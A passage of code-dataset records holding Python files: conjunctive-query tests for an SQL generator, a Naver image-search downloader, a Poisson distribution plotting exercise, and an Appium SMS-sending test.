\n#M(title) :- movie(title,_,length_mins,_), length_mins>=100.
\nr
= RelationInQuery('movie', [Variable('title'),Wildcard(),Variable('length_mins'), Wildcard()], False)\nq = ConjunctiveQuery([r], [Constraint(Variable('length_mins'), Constant('100'), '>=')], RelationInQuery('M', [Variable('title')]))\n\nqueries.append(q)\n# ------\n# Q(X):-!S(Y),X=Y,Y=2\nr = RelationInQuery('S', [Variable('Y')],True)\nq = ConjunctiveQuery([r],[Constraint(Variable('X'), Variable('Y'), '='),Constraint(Variable('Y'), Constant('2'), '=')],RelationInQuery('Q', [Variable('X')]))\n\nqueries.append(q)\n\n#------\n#Q(X):- S(X)\nr = RelationInQuery('S', [Variable('X')])\nq = ConjunctiveQuery([r],[],RelationInQuery('Q', [Variable('X')]))\nqueries.append(q)\n\n# ------\n# Q(X):- S(X), X = 2\nr = RelationInQuery('S', [Variable('X')])\nhead = RelationInQuery('Q', [Variable('X')])\nqueries.append(ConjunctiveQuery([r],[Constraint(Variable('X'),Constant('2'),'=')],head))\n\n# ------\n\ns = RelationInQuery('S', [Variable('X'),Variable('Y')])\nt = RelationInQuery('T', [Variable('X')], True)\nqueries.append(ConjunctiveQuery([s,t],[Constraint(Variable('Y'), Variable('Z'), '=')],RelationInQuery('Q',[Variable('X'),Variable('Z')])))\n\n\n# ------\n\n# R(X,Y),!S(Z), Y=Z\ns = RelationInQuery('R', [Variable('X'),Variable('Y')])\nt = RelationInQuery('S', [Variable('Z')], True)\n\nqueries.append(ConjunctiveQuery([s,t],[Constraint(Variable('Y'), Variable('Z'), '=')]))\n\n# R(X,Y),!S(Z)\n\ns = RelationInQuery('R', [Variable('X'),Variable('Y')])\nt = RelationInQuery('S', [Variable('Z')], True)\n\nqueries.append(ConjunctiveQuery([s,t],[]))\n\n\n# answer(X,Y) :- R(X,A), S(A,Y).\n\ns = RelationInQuery('R', [Variable('X'),Variable('A')])\nt = RelationInQuery('S', [Variable('A'),Variable('Y')])\nhead = RelationInQuery('answer',[Variable('X'),Variable('Y')])\nqueries.append(ConjunctiveQuery([s,t],[],head))\n\n# answer(X,2) :- R(X,A), S(A,_).\n\ns = RelationInQuery('R', [Variable('X'),Variable('A')])\nt = RelationInQuery('S', [Variable('A'),Wildcard()])\nhead = RelationInQuery('answer',[Variable('X'),Constant('2')])\nqueries.append(ConjunctiveQuery([s,t],[],head))\n\n\n# r(_,2)\n\nr = RelationInQuery('answer',[Wildcard(),Constant('2')])\nqueries.append(ConjunctiveQuery([r],[]))\n\n# R(_,A), S(A,_). 
-> answer(A) :- R(_,A), S(A,_).
\n
\ns = RelationInQuery('R', [Wildcard(),Variable('A')])
\nt = RelationInQuery('S', [Variable('A'),Wildcard()])
\n
\nqueries.append(ConjunctiveQuery([s,t],[]))
\n
\n# R(X,Y) :- S(X), S(Y), X>Y
\n
\ns = RelationInQuery('S', [Variable('X')])
\nt = RelationInQuery('S', [Variable('Y')])
\nhead = RelationInQuery('answer',[Variable('X'),Variable('Y')])
\nqueries.append(ConjunctiveQuery([s,t],[Constraint(Variable('X'),Variable('Y'),'>')],head))
\n
\n# R(X,Y) :- S(X), Y>2
\n
\ns = RelationInQuery('S', [Variable('X')])
\n
\nhead = RelationInQuery('answer',[Variable('X'),Variable('Y')])
\nqueries.append(ConjunctiveQuery([s],[Constraint(Variable('Y'),Constant('2'),'>')],head))
\n
\n# R(X,Y) :- S(X), X<2
\n
\ns = RelationInQuery('S', [Variable('X')])
\n
\nhead = RelationInQuery('answer',[Variable('X'),Variable('Y')])
\nqueries.append(ConjunctiveQuery([s],[Constraint(Variable('X'),Constant('2'),'<')],head))
\n
\n# answer(X,Y):-S(X,Z),S(Y,Z),X>Y
\n
\ns = RelationInQuery('S', [Variable('X'),Variable('Z')])
\nt = RelationInQuery('S', [Variable('Y'),Variable('Z')])
\nhead = RelationInQuery('answer',[Variable('X'),Variable('Y')])
\n
\nqueries.append(ConjunctiveQuery([s,t],[Constraint(Variable('X'),Variable('Y'),'>')],head))
\n
\n
\n# R(X) :- X = 2, 3<X
\n
\nhead = RelationInQuery('R',[Variable('X')])
\n
\nqueries.append(ConjunctiveQuery([],[Constraint(Variable('X'),Constant('2'),'='),Constraint(Constant('3'),Variable('X'),'<')],head))
\n
\n# r(_,2), X = 2
\n
\nr = RelationInQuery('R',[Wildcard(),Constant('2')])
\nqueries.append(ConjunctiveQuery([r],[Constraint(Variable('X'), Constant('2'), '=')]))
\n
\n# R(X,Y) :- S(X), S(Y), T(X), V(Y), X>Y
\ns = RelationInQuery('S', [Variable('X')])
\nt = RelationInQuery('S', [Variable('Y')])
\nu = RelationInQuery('T', [Variable('X')])
\nv = RelationInQuery('V', [Variable('Y')])
\nhead = RelationInQuery('answer',[Variable('X'),Variable('Y')])
\nqueries.append(ConjunctiveQuery([s,t,u,v],[Constraint(Variable('X'),Variable('Y'),'>')],head))
\ntest(queries)
\n
\n
\n","sub_path":"tests/sql_generator_tests.py","file_name":"sql_generator_tests.py","file_ext":"py","file_size_in_byte":4871,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"542546447","text":"from bs4 import BeautifulSoup
\nimport urllib.request as req
\nimport urllib.parse as rep
\nimport os
\nimport errno
\n
\n# Naver returns 403 Forbidden (access denied) for crawling and scraping requests that carry no header info, so the header info is added below
\nopener = req.build_opener()
\nopener.addheaders = [('User-agent', 'Mozilla/5.0')]
\nreq.install_opener(opener)
\n
\nbase = \"https://search.naver.com/search.naver?where=image&sm=tab_jum&query=\"
\nquote = rep.quote_plus(\"멍뭉이\")  # URL-encode the (Korean) search keyword
\nurl = base + quote
\n
\nres = req.urlopen(url)
\nsavePath = \"C:/Users/PSW/Desktop/HOLO/WebCrawler/Beautifulsoup/imagedown\"
\n
\ntry:
\n    if not (os.path.isdir(savePath)):  # check whether the directory already exists
\n        os.makedirs(os.path.join(savePath))  # create the directory if it does not
\nexcept OSError as e:
\n    if e.errno != errno.EEXIST:
\n        print(\"Failed to create the folder!\")
\n        raise
\n
\nsoup = BeautifulSoup(res, \"html.parser\")
\n
\nimg_list = soup.select(\"div.img_area > a.thumb._thumb > img\")  # the selector is easy to obtain via Copy selector in Chrome DevTools
\n
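\n# Illustrative note (markup assumed, reconstructed from the comments in the
\n# loop below rather than from the live page): each matched tag looks roughly
\n# like <img src=\"data:image/...;base64,...\" data-source=\"https://...jpg\">,
\n# so the downloadable URL is read from 'data-source' rather than 'src'.
\n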
\nfor i, img in enumerate(img_list, 1):  # loop variable renamed so it no longer shadows img_list
\n    #print(img['src'])  # 'src' holds a base64-encoded source... it cannot be used for downloading
\n    #print(img['data-source'])
\n    fullFileName = os.path.join(savePath, str(i) + \".jpg\")
\n    #print(fullFileName)
\n    req.urlretrieve(img['data-source'], fullFileName)
\n
\nprint(\"Download complete\")
\n","sub_path":"WebCrawler/Beautifulsoup/download2-8-1.py","file_name":"download2-8-1.py","file_ext":"py","file_size_in_byte":1427,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"288870989","text":"import numpy as np
\nimport matplotlib.pyplot as plt
\nimport math
\n
\n#PROBLEM 3: Bernoulli Trials by Poisson distribution
\n
\ndef problem3():
\n    n = 1000
\n    p = 0.001
\n    x = np.zeros((19, 1))
\n    y = np.zeros((19, 1))
\n
\n    #Performing calculations using the Poisson formula
\n    for k in range(19):
\n        lambdaVal = n * p
\n        f = (lambdaVal**k / math.factorial(k)) * math.exp(-lambdaVal)
\n        x[k] = k
\n        y[k] = f
\n
\n    plotting(x, y)
\n
\ndef plotting(x, y):
\n    # Setting the x values
\n    xRange = range(0, 19)
\n    xSize = np.size(xRange)  # number of x values
\n
\n    # Plotting stem plot for PMF
\n    plt.stem(x, y, use_line_collection=True)  # stem plot (x,y,...)
\n
\n    # Labels for the plot
\n    plt.title('Bernoulli Trials: PMF - Poisson Approximation', fontsize=14,  #CHANGE THE TITLES FOR EACH PLOT AND FOR EACH CODE YOU PUT IN REPORT
\n              fontweight='bold')
\n    plt.xlabel('Number of successes in n=1000 trials', fontsize=14)
\n    plt.ylabel('Probability', fontsize=14)
\n    plt.xticks(xRange)
\n    filename = input(\"Enter a name and extension (.pdf) to save the file as :\")
\n    plt.savefig(filename)
\n
\nproblem3()
\n","sub_path":"Probaility and Statistics/EE381_project3/problem3.py","file_name":"problem3.py","file_ext":"py","file_size_in_byte":1111,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"124517522","text":"import pytest
\n
\nfrom base.base_driver import baseDriver
\nfrom page.page_edit_mms import EditMms
\nfrom page.page_new_mms import NewMmS
\n
\n
\nclass TestMms():
\n
\n    def setup(self):
\n        self.driver = baseDriver(appPackage=\"com.android.mms\", appActivity=\"com.android.mms.ui.ConversationList\")
\n        self.newMms = NewMmS(self.driver)
\n        self.editMms = EditMms(self.driver)
\n
\n    def teardown(self):
\n        self.driver.quit()
\n
\n    @pytest.mark.parametrize((\"recipienter\", \"text\"), [(18871102549, \"hello01\"), (13545687895, \"这是中国哈哈哈哈\")])
\n    def test_sendMms(self, recipienter, text):
\n        self.newMms.click_new_mms()
\n        self.editMms.input_recipienter(recipienter)
\n        self.editMms.input_mms_text(text)
\n        self.editMms.click_send()","sub_path":"PO案例_案例/scripts/test_mms.py","file_name":"test_mms.py","file_ext":"py","file_size_in_byte":759,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}